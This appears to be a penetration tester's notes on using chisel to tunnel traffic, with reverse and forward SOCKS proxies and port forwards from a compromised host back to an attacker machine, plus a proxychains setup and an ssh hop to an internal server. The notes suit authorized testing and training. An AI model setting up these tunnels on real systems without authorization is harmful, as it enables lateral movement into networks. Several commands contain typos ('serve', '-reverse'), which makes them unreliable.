chisel
can use used to set up a tunneled proxy or port forward
doesn't require ssh
copy the files from github and extract with gunzip *
there must be an appropriate copy of the chisel binary on both the attacking machine and compromised server
Reverse Socks Proxy
set up a listener on your chosen port
./chisel serve -p listenport --reverse &on the compromised host do:
./chisel client ATTACKING_IP:LISTEN_PORT R:socks &
Forward Socks
rarer than reverse proxies
on the compromised host use:
./chisel server -p LISTEN_PORT --socks5on the attacking box
./chisel client targetip:listen_port proxy_port:socks
Remote Proxy Forward
for when we connect back from a compromised target to create the forward
on the attacking machine
./chisel server -p LISTENPORT --reverse &from the compromised serve
./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &

Local Port Forward
on the compromised server
./chisel serve -p LISTERN_PORTon the attacking machine
./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
Start the chisel server on kali
./chisel server -p 8000 -reverse
upload and start client on windows machine
.\chisel.exe client <kali ip>:8000 R:socks
configure Proxychain:
sudo vim /etc/proxy
sudo vim /etc/proxychains4.conf
comments out the existing socks4 127.0.0.1 and add the below
socks5 127.0.0.1 1080
proxychains4 commandtoexecute
or
ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215
Last updated